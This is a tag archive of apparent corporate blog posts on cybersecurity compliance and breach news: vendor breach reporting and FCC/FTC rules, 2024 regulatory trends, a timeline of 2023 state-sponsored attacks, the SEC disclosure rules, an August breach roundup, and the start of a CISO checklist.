Tag Archives: cybersecurity

Vendor Breach Reporting in the Modern Market

Vendor Breach Reporting guidelines findings 2024

We’ve hit a point in time where data breaches are becoming more common and the repercussions more severe. This highlights that the importance of effective vendor breach reporting cannot be overlooked. As companies are relying more and more on third-party vendors for a variety of services — from cloud storage solutions to customer relationship management systems, the potential for data breaches originating from these vendors escalates. This blog will explore the current landscape of vendor breach reporting, highlighting the challenges, best practices, and the evolving regulatory environment that shapes how businesses respond to and report breaches.

Understanding the Landscape

The modern market is interconnected, with businesses routinely sharing sensitive information with vendors. This symbiotic relationship, however, introduces vulnerabilities. A breach at a vendor can have cascading effects, compromising the data integrity of all connected businesses. The 2023 Verizon Data Breach Investigations Report underscores this point, noting an uptick in incidents originating from third-party vendors.

Challenges in Vendor Breach Reporting

One of the primary challenges in vendor breach reporting is the detection and attribution of breaches. Identifying that a breach has occurred, and tracing it back to a specific vendor, requires sophisticated monitoring tools and a high degree of coordination between parties. Moreover, the variability in reporting requirements across jurisdictions adds a layer of complexity, making compliance a moving target for global businesses.

Best Practices for Effective Reporting

To navigate these challenges, businesses must adopt a proactive and comprehensive approach to vendor management and breach reporting. Key strategies include:

  • Due Diligence: Before entering into agreements with vendors, assess their security policies and incident response capabilities. Regular audits can ensure ongoing compliance with agreed-upon standards.

  • Transparent Communication: Establish clear lines of communication for reporting potential security incidents. This includes setting up contractual obligations for vendors to notify you immediately in the event of a breach.

  • Incident Response Planning: Develop a coordinated incident response plan that includes vendors. This plan should outline steps for breach investigation, notification, and mitigation, ensuring a swift and unified response.

  • Regulatory Compliance: Stay informed about the evolving regulatory landscape. Many regulations have set stringent requirements for data breach notification, including specific timelines and conditions under which breaches must be reported. Failure to comply can result in significant fines, legal fees, and damage to a company’s reputation.

The Evolving Regulatory Environment

Governments around the world are tightening regulations around data protection and breach notification. The trend is towards more stringent reporting requirements, with an emphasis on consumer protection. For instance, amendments to the GDPR and CCPA are pushing for shorter notification windows and greater transparency in the event of a breach. More recently, in 2024, The Federal Communications Commission (FCC) has finalized new breach reporting rules that significantly tighten the requirements for telecommunications carriers in the US. Now, these carriers have only seven days to disclose data breaches. The rules have expanded the definition of breaches to include inadvertent access or disclosure of customer information, which now encompasses not only Customer Proprietary Network Information (CPNI) but also personally identifiable information (PII) such as names, government ID numbers, biometric data, and email addresses/passwords. This change aims to cover a broader range of data and ensure customers are notified of breaches unless the carrier determines no harm is reasonably likely to occur. The updated rules now require that, in addition to the FBI and U.S. Secret Service, the FCC must also be notified of breaches.

Lastly, The Federal Trade Commission (FTC) has introduced an amendment to its Safeguards Rule, imposing a 30-day deadline for non-banking financial organizations to report incidents involving 500 consumers or more. This amendment aims to bolster consumer data security by demanding comprehensive incident reports, driving stronger security practices in the financial sector.

Closing Thoughts:

In the modern market, effective vendor breach reporting is not just a regulatory requirement; it’s a critical component of a company’s overall cybersecurity strategy. By implementing best practices for vendor management and staying abreast of regulatory changes, businesses can better protect themselves and their customers from the fallout of data breaches. As the digital landscape continues to evolve, so too must the strategies for safeguarding against and responding to security incidents. The key to resilience in the face of these challenges lies in preparation, partnership, and proactive engagement with the issue of vendor breach reporting.

 

Findings Can Help

2024 Trends Unveiled: Cybersecurity as a Key Business Enabler

As 2024 unfolds, we are witnessing a revolutionary transformation in the cybersecurity landscape. No longer a mere aspect of IT, cybersecurity is now a pivotal driver in reshaping business operations on a global scale. This blog post delves into the forefront of cybersecurity compliance, highlighting pivotal regulations such as the ASEAN Guidelines on Consumer Impact Assessment (CIA), CMMC, PCI DSS 4.0, DORA, and SEC incident disclosure regulations. These emerging trends are rapidly becoming the gold standard in global business cybersecurity practices.

 

CMMC: Evolving from Defense to a Universal Cybersecurity Benchmark

  • The Cybersecurity Maturity Model Certification (CMMC) is evolving from its U.S. defense sector roots to a worldwide cybersecurity standard. Now applicable across various industries, CMMC’s layered cybersecurity approach is garnering universal acceptance. Its comprehensive framework, focused on continuous improvement, is especially vital for entities managing sensitive or critical data, signifying a move towards standardized cybersecurity excellence.

PCI DSS 4.0: Revolutionizing Payment Security Standards

  • PCI DSS 4.0 is revolutionizing payment security standards globally in 2024. This updated version introduces an adaptive, risk-based approach, essential for any business involved in digital transactions. Its flexibility and focus on tailored security measures are vital for e-commerce, financial institutions, and others in the payment ecosystem, making PCI DSS 4.0 compliance synonymous with secure and trustworthy payment processing.

DORA: Spearheading Digital Resilience in the Financial Sector

  • The Digital Operational Resilience Act (DORA) is a groundbreaking EU regulation shaping the financial sector’s approach to digital risks in 2024. Its influence extends globally, affecting financial entities interacting with the EU market. DORA emphasizes operational resilience, highlighting the need for robust digital risk management in today’s interconnected digital finance landscape.

SEC Incident Disclosure: Championing Transparency in Corporate Cybersecurity

  • The SEC’s incident disclosure regulations are leading a worldwide movement towards transparency in corporate cybersecurity. These mandates, which require prompt and detailed disclosure of cybersecurity incidents, are becoming critical for publicly traded companies globally. This shift towards transparency and accountability in cybersecurity reflects an increasing demand from investors and consumers for trustworthiness and integrity in corporate practices.

ASEAN CIA: Redefining Cybersecurity with a Consumer-Centric Approach

  • The ASEAN Guidelines on Consumer Impact Assessment, originating from Southeast Asia, are now setting a global precedent. These guidelines shift the focus towards assessing cybersecurity’s impact on consumers, prioritizing their rights and data privacy. This consumer-centric approach, especially critical for businesses in or targeting the ASEAN market, is now a global best practice. It underscores the imperative of balancing robust security with consumer rights, a notion gaining traction across various industries.

Other Regulatory Developments Shaping the Cybersecurity Domain

Additional global regulations also predict significant cybersecurity trends:

  • GDPR: Continues to influence data privacy and protection globally, impacting businesses handling EU citizens’ data.

  • ISO/IEC 27001: Gaining traction as a comprehensive framework for managing information security, key for organizations striving for global best practices.

  • NIST Framework: Increasingly adopted worldwide, indicating a move towards unified approaches in cybersecurity risk management.

Cybersecurity Compliance: A Strategic Business Advantage

In 2024, adherence to these emerging cybersecurity regulations offers businesses a strategic advantage. It transcends legal compliance, fostering trust, enhancing brand reputation, and providing a competitive edge. The integration of AI in cybersecurity is another emerging practice, offering efficient and effective solutions for meeting these standards.

  • Increased Focus on Supply Chain Attacks: Modern supply chains are interconnected and complex, making them susceptible to cyberattacks. A breach in one part can have a cascading effect, impacting multiple businesses. This emphasizes the need for rigorous cybersecurity measures across the entire supply chain.

  • Collaborative Risk Management: The trend towards collaborative defense strategies is based on the principle that sharing threat intelligence and best practices can strengthen the security posture of all involved parties. By learning from each other’s experiences, industries can develop more effective defenses against common threats.

State-Sponsored Cyber Attacks: An Escalating Concern

  • Global Ramifications: State-sponsored cyberattacks are particularly concerning due to their scale and impact. These attacks target critical infrastructure, such as energy grids or financial systems, and can compromise national security. The global nature of these threats requires an international response and cooperation.

  • Advanced Countermeasures: To combat these sophisticated threats, organizations need to implement advanced threat detection systems that can identify and neutralize attacks quickly. A zero-trust security model, where trust is never assumed and verification is required from everyone, can be crucial in mitigating these risks. Continuous monitoring ensures that any suspicious activity is detected and addressed promptly.

AI in Cybersecurity: A Complex Role

  • Enhanced Detection and Response: AI can significantly improve threat detection by analyzing vast amounts of data to identify patterns that may indicate a cyberattack. However, this technology can also be used by attackers to create more sophisticated threats, such as deepfakes or AI-driven phishing attacks.

  • Proactive Mitigation Strategies: Organizations must not only invest in AI-based defense systems but also ensure that their workforce is trained to recognize and respond to AI-generated threats. This includes understanding the limitations of AI and being able to identify when a human response is required.

Ransomware Evolution: The Changing Landscape of Cyber Extortion

  • Sophisticated Tactics: Modern ransomware attacks are more than just data encryption; attackers are now threatening to leak sensitive data if the ransom isn’t paid, adding an extra layer of coercion. This dual-threat approach makes it even more challenging for victims to decide whether to pay the ransom or risk public exposure of their data.

  • Comprehensive Defense Strategies: To protect against these evolving ransomware threats, organizations must have robust backup systems that can restore data with minimal loss. Employee training is crucial to help staff recognize and avoid potential ransomware attacks. Additionally, a well-prepared incident response plan can ensure quick action to mitigate damage if an attack occurs.

The Metaverse and Cloud Security: New Frontiers, New Risks

  • Expanded Attack Vectors: As businesses venture into new digital domains like the metaverse and cloud platforms, they face new cybersecurity challenges. These platforms can provide attackers with novel ways to exploit security vulnerabilities.

  • Proactive Security Measures: Ensuring security in these new environments involves a comprehensive approach that includes strong encryption to protect data, robust identity management to verify users, and regular security audits to identify and address vulnerabilities.

The Human Element: Bolstering the Frontlines of Cyber Defense

  • Empowering Through Training and Awareness: Regular and comprehensive training programs are essential in equipping employees with the necessary skills to recognize and prevent security breaches. This training should cover the latest cybersecurity threats and best practices.

  • Cultivating a Security-First Mindset: Creating a culture of security within the organization is crucial. This involves fostering an environment where employees are aware of the importance of cybersecurity and are motivated to take proactive steps to protect the organization’s digital assets.

As 2024 progresses, it’s clear that these cybersecurity trends and regulations are not just shaping, but redefining business strategies. From the consumer-centric ASEAN CIA guidelines to CMMC’s comprehensive security model, and the transparency demanded by SEC disclosure regulations, these developments are crucial in enabling businesses to thrive in the digital era. By staying ahead of these trends, companies can harness cybersecurity not only as a compliance requirement but as a cornerstone for growth and success. Understanding evolving regulations, embracing innovative technologies, and reinforcing human-centric defenses remain key to ensuring business resilience and triumph in an increasingly digitized world.

Analyzing the Rise of State Sponsored Cyber Attacks

Explore the global impact of state-sponsored cyber attacks through a detailed timeline of significant incidents since January 2023.

A Timeline & Global Impact of State-Sponsored Cyber Attacks: 

State-sponsored cyber attacks have become an increasingly prevalent threat in recent years. These attacks are often carried out by nation-states seeking to gain an advantage over their geopolitical rivals, whether by stealing sensitive information or disrupting critical infrastructure. Analyzing the rise of state-sponsored cyber attacks is a complex task that requires a deep understanding of the geopolitical landscape and the motivations of nation-states.

 It is important for governments and private organizations alike to invest in cybersecurity measures that can mitigate the risk of state-sponsored cyber attacks. This includes measures such as network segmentation, access controls, and regular security assessments.

Analyzing the Escalation of State-Sponsored Cyber Attacks:

The increasing prevalence of such attacks can be attributed to several factors. Firstly, the rapid digitization of essential infrastructure has amplified its susceptibility to cyber intrusions. Secondly, the emergence of sophisticated hacking collectives backed by nation-states has facilitated large-scale cyber offensive operations. Thirdly, the inherent anonymity of cyberspace impedes accountability, allowing malicious actors to operate with relative impunity. With actors increasingly targeting critical infrastructures, this has led to a doubling of such attacks over the past two years, costing organizations an estimated $1.6 million per incident. The threat landscape is evolving, particularly with the integration of cyber warfare in geopolitical conflicts like the Russo-Ukrainian war.

Nation-state actors are well-funded and highly skilled, primarily targeting government, military, think tanks, universities, and critical infrastructure providers. The impact of state-sponsored cyber attacks extends even further, hitting various sectors, such as healthcare, telecommunications, and defense, causing financial losses and intellectual property theft. These attacks have also blurred the lines between APTs and cybercrime, with state-backed groups engaging in cybercriminal activities for profit.

Below I’ve outlined a timeline of notable significant cyber incidents that have unfolded since January 2023, focusing on assaults targeting government bodies, defense organizations, high-tech enterprises, and economic crimes resulting in losses exceeding a million dollars. In this rapidly evolving landscape of cyber warfare and data breaches, this timeline provides a glimpse into the persistent and evolving threats that shape the world we live in today. If you’re interested in reading all of these events since 2006, read on here.



Timeline of Significant Cyber Incidents in 2023:

  • January 2023:

    • CISA, the NSA, and the Multi-State Information Sharing and Analysis Center release a joint advisory warning of an increase in hacks on the federal civilian executive branch utilizing remote access software.

    • Russia-linked hackers deploy a ransomware attack against the UK postal service, the Royal Mail.

    • Iran-linked hackers execute ransomware attacks and exfiltrate data from U.S. public infrastructure and private Australian organizations.

    • Hackers use ransomware to encrypt 12 servers at Costa Rica’s Ministry of Public Works.

    • Albanian officials report that its government servers were still near-daily targets of cyber-attacks after a major attack linked to Iranian hackers in 2022.

    • Hackers targeted Asia Pacific networks, using malware to access confidential data and captured audio from victim machines.

    • Malevolent actors distributed over a thousand emails with harmful links to government accounts in Moldova.

  • February 2023:

    • A pro-Russian hacker group claimed a DDoS attack on NATO networks, disrupting communications with earthquake relief airplanes at a Turkish airbase and temporarily disabling NATO’s sites.

    • North Korean hacking group conducted a covert espionage campaign between August and November 2022. They targeted various sectors, exfiltrating 100MB+ of data from each victim without detection. This group is linked to the North Korean government.

    • Latvian officials claim that Russian hackers launched a phishing campaign against its Ministry of Defense.

    • Iranian hacktivists claim responsibility for taking down websites for the Bahrain international airport and state news agency.

    • In a ransomware attack on Technion University, Israel’s leading technology education program, hackers demanded 80 bitcoin (equivalent to $1.7 million USD) to decrypt the university’s files. Israeli cybersecurity authorities attributed the attack to Iranian state-sponsored hackers.

    • Hackers disabled Italy’s Revenue Agency website and sent phishing emails to users, leading them to a fake login page resembling the official site.

    • Chinese cyberespionage hackers perform a spear-phishing campaign against government and public sector organizations in Asia and Europe. The emails

  • March 2023:

    • Russian hackers bring down the French National Assembly’s website using a DDoS attack.

    • CISA and FBI revealed that a U.S. federal agency was subjected to a cyberespionage campaign between November 2022 and January 2023. The hackers exploited a vulnerability in the agency’s Microsoft Internet Information Services (IIS) server to implant malware.

    • South Asian hacking group targets firms in China’s nuclear energy industry.

    • North Korean hackers target U.S.-based cybersecurity research firms.

    • Chinese cyber espionage group targets government entities in Vietnam, Thailand, and Indonesia.

    • Russian hackers launch social engineering campaigns targeting U.S. and European politicians, businesspeople, and celebrities.

    • Slovakian cybersecurity researchers discover a new exploit from a Chinese espionage group targeting political organizations in Taiwan and Ukraine.

    • Poland blames Russian hackers for a DDoS attack on its official tax service website.

  • April 2023:

    • Sudan-linked hackers conduct a DDoS attack on Israel’s Independence Day.

    • NSA cyber authorities report evidence of Russian ransomware and supply chain attacks against Ukraine and other European countries.

    • Iranian state-linked hackers target critical infrastructure in the U.S. and other countries.

    • Recorded Future releases a report revealing data exfiltration attacks against South Korean research and academic institutions.

    • Chinese hackers target telecommunication services providers in Africa.

    • Russia-linked threat group launches a DDoS attack against Canadian Prime Minister Justin Trudeau.

    • North Korea-linked hackers shift focus to espionage targeting defense industry firms in Eastern Europe and Africa.

    • Ukraine-linked hacktivists target the email of Russian GRU Unit26165’s leader.

  • May 2023:

    • Belgium’s cyber security agency links China-sponsored hackers to a spearfishing attack on a prominent politician.

    • Chinese hackers breach communications networks at a U.S. outpost in Guam.

    • Chinese hackers target Kenyan government ministries and state institutions.

    • Russia-linked hackers target government organizations in Central Asia.

    • Unidentified group hacks targets in both Russia and Ukraine for surveillance and data gathering.

  • June 2023:

    • Alleged group tied to private military corporation Wagner hacks a Russian satellite telecommunications provider.

    • Pakistani-based hacker group infiltrates the Indian army and education sector.

    • Pro-Russian hacktivists attack European banking institutions, including the European Investment Bank.

    • U.S. federal government agencies, including Department of Energy entities, breached in a global cyberattack by Russian-linked hackers.

    • Illinois hospital closes due to a ransomware attack.

    • Pro-Russian hackers target Swiss government websites, including those for Parliament and the federal administration.

    • North Korean hackers impersonate tech workers to steal funds for ballistic missiles program.

    • Ukrainian hackers attack a Russian telecom firm providing critical infrastructure to the Russian banking system.

    • Russia’s Federal Security Services allege Apple worked with US intelligence agencies to hack iPhones belonging to Russian users and foreign diplomats.

  • July 2023:

    • China claims an earthquake monitoring system in Wuhan was hacked by U.S. cybercriminals.

    • Kenyan eCitizen service disrupted by pro-Russian cybercriminals.

    • Russian-linked hackers target Ukrainian state services like the app “Diia.”

    • DDoS attack on the Ministry of Justice in Trinidad and Tobago disrupts court operations.

    • New Zealand’s parliament hit by a cyberattack from a Russian hacking group.

    • Russian hackers target twelve government ministries in Norway to gain access to sensitive information.

    • A South Korean government-affiliated institution falls victim to a phishing scandal.

    • Chinese-linked hackers infect a Pakistani government app with malware.

    • Chinese hackers breach emails of several prominent U.S. government employees.

    • Russian hackers target attendees of the latest NATO Summit in Vilnius.

    • Polish diplomat’s advertisement corrupted by Russian hackers to target Ukrainian diplomats.

  • August 2023:

    • Russian hacktivists launch DDoS attacks on Czech banks and the stock exchange, demanding they stop supporting Ukraine.

    • Unnamed hackers take down X (formerly Twitter) in several countries, demanding Starlink be opened in Sudan.

    • Cybercriminals sell a stolen dataset from China’s Ministry of State Security, compromising personal information for half a billion Chinese citizens.

    • Russian hacktivists launch DDoS attacks on Polish government websites, the Warsaw Stock Exchange, and Polish national banks.

    • Russian hackers disable Poland’s rail systems and transmit propaganda during the attack.

    • Chinese hackers target a U.S. military procurement system and Taiwan-based organizations.

    • Ukrainian hackers breach a senior Russian politician’s email and leak sensitive documents connecting him to illegal activities.

    • Ecuador’s national election agency faces cyberattacks during the latest election.

    • Suspected North Korean hackers attempt to compromise a joint U.S.-South Korean military exercise.

    • Bangladesh shuts down central bank and election commission websites to prevent cyberattacks.

    • Belarusian hackers target foreign embassies with disguised malware.

    • Chinese hackers obtain personal and political emails of a U.S. Congressman.

    • Iranian cyber spies target dissidents in Germany using false digital personas and credential harvesting.

    • Ukrainian hackers uncover Russian attempts to deploy custom malware against Starlink satellites.

    • Russian hackers launch a ransomware attack against a Canadian government service provider.

    • Canadian politician targeted by a Chinese disinformation campaign on WeChat.

    • Canadian government accuses a highly sophisticated Chinese state-sponsored actor of hacking a federal scientific research agency.

    • Russia’s military intelligence service attempts to hack Ukrainian Armed Forces’ combat information systems.

    • Russian hackers breach the UK’s Electoral Commission network.

    • North Korean hackers breach a Russian missile developer’s computer system.



The diverse array of targets, from critical infrastructures to government bodies, reveals a tumultuous digital landscape. To fortify our digital defenses against the onslaught of nation-state cyber activities, it is crucial that we advance technological innovation, foster international cooperation, and cultivate a culture of cybersecurity awareness.

The SEC’s New Cyber Rules

what every ciso needs to know about the new cybersecurity sec rules

What Every Public Company CISO Must Know:

The role of a Chief Information Security Officer (CISO) in public companies has never been more pivotal. With cyber threats escalating in scale and sophistication, the Securities and Exchange Commission (SEC) has rolled out new cyber regulations aimed at safeguarding investors, stakeholders, and the broader market. Given that the amendments took effect on September 5, 2023, it’s crucial for your organization to be informed. While the final rules are quite lengthy, I’ll offer a condensed and digestible version in this blog post to help you understand the key points – so make sure to read on!

The Backdrop:

Back in March 2022, the Commission took the bold step of introducing a suite of regulations. The intent was clear: fortify public company disclosures concerning cybersecurity. This encompassed key areas such as cyber threats, strategic countermeasures, governance structures, and insights into major cyber incidents.

At the time, there were several major trends that led the Commission to take this action. The digital evolution and massive work-from-home shifts, intertwined with the allure of cybercrime monetization and an overarching reliance on third-party tech services like cloud platforms, have stretched cyber risk boundaries. The financial fallout from cyber incidents have also skyrocketed. Given all of this, the Commission’s move to ensure transparency isn’t just timely—it’s imperative.

Though the Commission offered guidance in 2011 and 2018, the standards remained inconsistent. The 2022 regulations were introduced to bring consistency and offer investors clearer insights.

Key Mandates To Be Aware Of:

Skip ahead to 2023, and the SEC’s proposed rules have officially transformed into finalized rules. Here are the essential highlights you should be aware of…

  1. Form 8-K Item 1.05: A pivotal element in the new regulations. Public companies now have the duty to report significant cyber incidents. Reports must, “describe the material aspects of the nature, scope, and timing of the incident, as well as the material impact or reasonably likely material impact of the incident on the registrant, including its financial condition and results of operations.” 

  2. Disclosure Timeline: Post a cyber event, companies need to swiftly gauge its significance. If found consequential, a Form 8-K needs to be filed within four business days. However, exceptions do exist. Should the U.S. Attorney General deem a quick disclosure a threat to national or public safety, delays can ensue.

  3. Regulation S-K Item 106: This regulation delves deep. It mandates firms to shed light on their cyber threat assessment, detection, and management strategies. Past incidents that have or might have considerable ramifications also need to be outlined. Plus, it casts the spotlight on how involved the board is in overseeing cyber risks and the prowess of the management in mitigating them.

  4. International Disclosures: The SEC is highlighting that global transparency is crucial. Modifications to Form 6-K and Form 20-F ensure that foreign private entities aren’t left out. Significant cyber events disclosed overseas or required by foreign issuers need to be detailed.

What Lies Ahead:

The new regulations will be operational a month after their Federal Register appearance. For companies, the compliance timelines are split based on the form:

  • Regulation S-K Item 106 & Form 20-F: Disclosure starts with annual statements for fiscal years ending on or after December 15, 2023.

  • Form 8-K Item 1.05 & Form 6-K: Compliance starts 90 days post Federal Register publication or by December 18, 2023, except for smaller firms. They have until June 15, 2024.

  • Finally, when it comes to structured data mandates, the spotlight is on Inline XBRL. The final rules require the cybersecurity disclosures to be presented in Inline eXtensible Business Reporting Language. Entities must tag their disclosures using this format, a year after the kick-off of initial disclosure duties. To simplify what this filing format is for those who may not be aware, it’s a special language for computers that makes it possible to create a single document that’s human and machine readable. So, instead of making two different documents (one for people to read and one for computers to understand), you just make one using Inline XBRL.

Every day we are reminded how crucial cyber resilience is. For CISOs in public companies, aligning with the SEC’s updated cyber regulations is not just about compliance—it’s a commitment to transparency, investor protection, and long-term business sustainability.



August Data Breach And Security Round Up

august security breach round up

August may be known for summer vacations and relaxing by the beach, but in the world of hackers, it was a month of action-packed cyber escapades. As the digital realm grows, so does the audacity of those who breach the walls of data security. In this blog post, I will take you through the breaches that unfolded in the hot days of August. From electric cars to language learning apps, we’ve got it all covered. Let’s dive in.

Tesla:

Tesla recently reported a data breach affecting over 75,000 of its employees to insider misconduct, according to an official statement. The electric vehicle manufacturer, headed by Elon Musk, stated in a data breach report submitted to Maine’s Attorney General that a thorough investigation determined two former employees had disclosed personal information belonging to more than 75,000 individuals to a foreign media organization.

Tesla’s data privacy officer, Steven Elentukh, stated in the report that “the investigation uncovered that two former Tesla employees wrongfully obtained and shared this information, contravening Tesla’s IT security and data protection protocols by providing it to the media outlet.”

The sensitive data included personally identifiable details such as names, addresses, contact numbers, employment records, and Social Security numbers of 75,735 past and current Tesla employees. The report also revealed that the two ex-employees had transmitted this data to the German newspaper Handelsblatt, which assured Tesla it would refrain from publishing the information and adhere to legal restrictions concerning its use.

In May, Handelsblatt had previously reported a significant breach at Tesla, disclosing various internal documents, known as the “Tesla Files,” totaling 100 gigabytes of confidential information. These documents included employee personal data, customer banking information, proprietary production details, and customer grievances regarding Tesla’s Full Self-Driving (FSD) functionalities. Remarkably, the leak even contained Elon Musk’s Social Security number.

Tesla responded by initiating legal action against the individuals believed to be responsible for the data breach, leading to the confiscation of their electronic devices. Additionally, the company obtained court orders to prevent these former employees from further accessing, sharing, or using the data, with potential criminal consequences for violations.

This incident follows a previous report in April by Reuters, which revealed that Tesla employees had shared sensitive images recorded by customer vehicles, including invasive pictures and videos captured by car cameras, over the period from 2019 to 2022.

Duolingo:

In January 2023, a data breach of Duolingo resulted in the exposure of 2.6 million users’ data on a hacking forum. This has created an opportunity for malicious actors to execute targeted phishing campaigns using the compromised information. The dataset consists of public login and real names, along with confidential details, such as email addresses and internal data related to the Duolingo platform, which can be exploited in cyberattacks.

The data was acquired by exploiting a publicly available application programming interface (API), which had been openly shared since at least March 2023. Researchers had been posting on social media and public platforms about the ease of using this API, which ultimately led to the data breach. The API permits anyone to input a username and receive JSON output containing the user’s publicly accessible profile data. Importantly, it also facilitates the input of an email address into the API to confirm its association with a valid Duolingo account.

The presence of email addresses in the dataset raises significant concerns as it can be exploited in phishing campaigns, which can have detrimental effects on individuals and organizations. It is vital to note that while the inclusion of real names and login names is part of a user’s Duolingo profile, the presence of email addresses is not considered public information.

Companies often downplay the significance of scraped data, as much of it is already publicly accessible, even if its compilation is not straightforward. However, when public data is combined with private information, such as phone numbers and email addresses, it amplifies the risk associated with the exposed data and may potentially breach data protection regulations. Facebook encountered a significant breach in 2021 when an “Add Friend” API flaw was exploited to link phone numbers to Facebook accounts for 533 million users. Subsequently, the Irish Data Protection Commission (DPC) imposed a fine on Facebook for this mishandling of scraped data.

I will say, it is also pretty concerning that the API, which led to the Duolingo data breach, is still openly accessible on the internet, even after reports of its misuse were forwarded to Duolingo in January. This puts Duolingo users at risk and highlights the need for companies to take data protection seriously. While companies may downplay the significance of scraped data, the potential for harm is significant, and it is crucial to address these issues proactively to ensure that personal information remains secure.

Discord.io:

On August 14, 2023, an unofficial platform known for providing redirect and invitation links to Discord servers, Discord.io, suffered a significant data breach. The hacker “Akhirah” exposed the breach, which has compromised the personal information of more than 760,000 users.

The stolen data from the breach includes usernames, Discord IDs, email addresses, and passwords that have been salted and hashed. While the password encryption offers a degree of protection, the potential for decryption remains a looming threat, underscoring the immediate need for users to bolster their security. Discord.io urges users to change their passwords to mitigate the impact of the breach.

Discord.io has taken the unprecedented step of indefinitely suspending its operations in response to the breach. Visitors to the Discord.io website now encounter a message detailing the seriousness of the breach. The company is being transparent about the compromised data fields, aiming to provide affected users with clarity regarding the information exposed and what remains secure in the wake of this incident.

“We have canceled existing premium subscriptions, and we will be reaching out to affected users individually. As of now, we have not been contacted by those responsible for the breach, nor have we initiated contact with them. To our knowledge, the database has not been made public at this time.” – Discord.io

In an interview with the hacker Akhirah, he expressed a desire for Discord.io to eliminate malicious content from their platform and communicate with him to resolve these issues, without seeking retribution or a reward.

This data breach follows a similar trend in the cybersecurity landscape. Just recently, the LetMeSpy Android Spyware Service also announced its permanent shutdown following a successful breach by a hacker who gained access to user data.

SEIKO: 

SEIKO NPC Corporation, a long-established Japanese semiconductor manufacturer founded in 1975 with approximately 12,000 employees, has officially recognized the possibility of a data breach.

On August 10th, the company posted a data breach notification on its website. However, cybersecurity experts only recently became aware of the breach after the ransomware group BlackCat featured SEIKO on its data leak platform.

SEIKO did not provide specific details but referred to the cybersecurity incident as a “potential” data breach.

According to SEIKO, “On July 28th of this year, the company experienced a potential data breach. It appears that unauthorized individuals or parties gained access to at least one of our servers.”

ALPHV/BlackCat Ransomware, now taking credit for the breach, shared several files on their data leak platform as evidence. Among these files was what appeared to be a copy of Yoshikatsu Kawada’s passport, a director at SEIKO’s well-known Watch Corporation subsidiary.

After an external cybersecurity expert examined the incident, SEIKO determined that a breach occurred, and some of the company’s information may have been compromised.

“At present, we are in the process of confirming the precise nature of the information stored on the affected servers. Once our ongoing investigation yields more specific results, we will promptly provide an update,” the company stated. However, no further updates regarding the breach have been made available thus far.

About ALPHV/BlackCat Ransomware:

ALPHV/BlackCat ransomware first emerged in 2021. Similar to other entities in the cybercriminal realm, this group operates a ransomware-as-a-service (RaaS) enterprise, selling malware subscriptions to criminal actors. Notably, the gang employs the Rust programming language.

According to an analysis by Microsoft, threat actors associated with this ransomware were known to collaborate with other prominent ransomware families such as Conti, LockBit, and REvil.

The FBI has suggested that money launderers affiliated with the ALPHV/BlackCat cartel have ties to Darkside and Blackmatter ransomware cartels, indicating a well-established network of operatives within the RaaS sector.

Recently, ALPHV/BlackCat has been notably active among ransomware groups. According to cybersecurity analyst ANOZR WAY, the group was responsible for approximately 12% of all attacks in 2022.

This gang appears to have recently focused its efforts on professional service providers. In mid-May, it claimed responsibility for breaching Mazars Group, an international firm specializing in auditing, accounting, and consulting services.

Forever 21:

Clothing and accessories retailer, Forever 21, is in the process of sending data breach notifications to over half a million individuals whose personal information was exposed to unauthorized intruders. The company operates a global network of 540 outlets and has a workforce of approximately 43,000 employees.

A portion of the data breach notification, shared with the Office of the Maine Attorney General, reveals that the company detected a cyberattack on multiple systems on March 20. The investigation unveiled that hackers had sporadic access to Forever 21 systems between January and March of this year and utilized this access to pilfer data.

“The investigation determined that an unauthorized third party accessed specific Forever 21 systems at different intervals between January 5, 2023, and March 21, 2023,” states the notice. “Results from the investigation indicate that the unauthorized third party acquired specific files from certain Forever 21 systems during this timeframe” – Forever 21.

The data breach notice, dispatched on August 29 to 539,207 affected individuals, lists the following potentially exposed data types:

  • Full names

  • Social Security Numbers (SSN)

  • Dates of Birth

  • Bank Account Numbers

  • Forever 21 Health Plan information

BleepingComputer reached out to Forever 21 to ascertain if the security incident impacted both customers and employees. A spokesperson from the company issued the following statement: “The incident was limited to current and former Forever 21 employees and did NOT affect personal data pertaining to Forever 21 customers.”

In the notice, Forever 21 reports that they have taken steps to ensure that the hackers have deleted the stolen data, implying that the company may have engaged in communication with the attacker. Such actions often occur following ransomware attacks, where the victim negotiates with the hackers to reach a reasonable ransom. However, it is important to note that a ransomware attack on Forever 21 has not been confirmed.

In November 2017, Forever 21 informed its customers of another data breach affecting its payment system, resulting in the compromise of card data from transactions made between March and October 2017.

Italian Banks Temporarily Disabled by Distributed Denial of Service (DDoS) Attacks:

Several banks in Italy recently experienced temporary outages due to targeted Distributed Denial of Service (DDoS) attacks.

On August 1st, the Agenzia per la Cybersicurezza Nazionale (ACN) announced that it had identified cyberattacks against at least five banks in the country, resulting in a temporary disruption of their services.

The affected banks included BPER Banca (EMII.MI), Intesa Sanpaolo (ISP.MI), FinecoBank (FBK.MI), Popolare di Sondrio (BPSI.MI), and Monte dei Paschi di Siena (BMPS.MI).

According to the ACN, it “detected the resurgence of distributed denial of service (DDoS) attack campaigns carried out by pro-Russian… groups targeting national institutional entities.” The ACN attributed the attacks to the Russian hacking group known as “NoName.”

An employee from one of the affected banks informed Reuters that the bank’s website was taken offline due to a substantial surge in traffic. However, the bank’s mobile app continued to function normally during the attack, and the website was restored after a brief period.

The ACN stated that it provided assistance to all those affected by the DDoS attacks launched by NoName.

What Are DDoS Attacks?

Distributed Denial of Service (DDoS) attacks involve malicious actors attempting to disrupt a website by overwhelming its infrastructure with a significant volume of internet traffic. As DDoS attacks saturate a site’s bandwidth, users are unable to access it.

DDoS attacks can be motivated by various factors, but their primary objective is to cause disruption by temporarily taking websites offline. Due to their disruptive nature, DDoS attacks are employed by malicious entities as a means of directly targeting specific individuals or organizations.

Moving Forward:

Data breaches can have severe consequences for both companies and individuals, including financial loss, reputational damage, and identity theft. As the frequency and sophistication of cyberattacks continue to increase, it is crucial for companies to prioritize data protection and implement robust security measures. By staying vigilant and proactive in their approach to cybersecurity, organizations can minimize the risk of a data breach and protect their customers’ trust.


The Top 10 Things Every CISO Should Know

what every ciso should know about

What Every CISO Should Know in 2023 to Protect Their Business


In our rapidly evolving digital age, the role of a Chief Information Security Officer (CISO) has never been more crucial. As a CISO, your role stretches far beyond traditional IT security measures. You are the protector of your organization’s most valuable assets, from intellectual property to customer data. The following insights delve deeper into what every CISO should know in 2023 to ensure they’re at the forefront of safeguarding their business.


1. Grasping the Business

Understanding your business inside out is paramount. The best CISOs fully comprehend the company’s goals, mission, and operational mechanics. Why is this so vital? Because only with this understanding can you adequately prioritize and champion security initiatives. Furthermore, by aligning security measures with business goals, you ensure that security is not viewed as a roadblock but rather an enabler of growth and success.


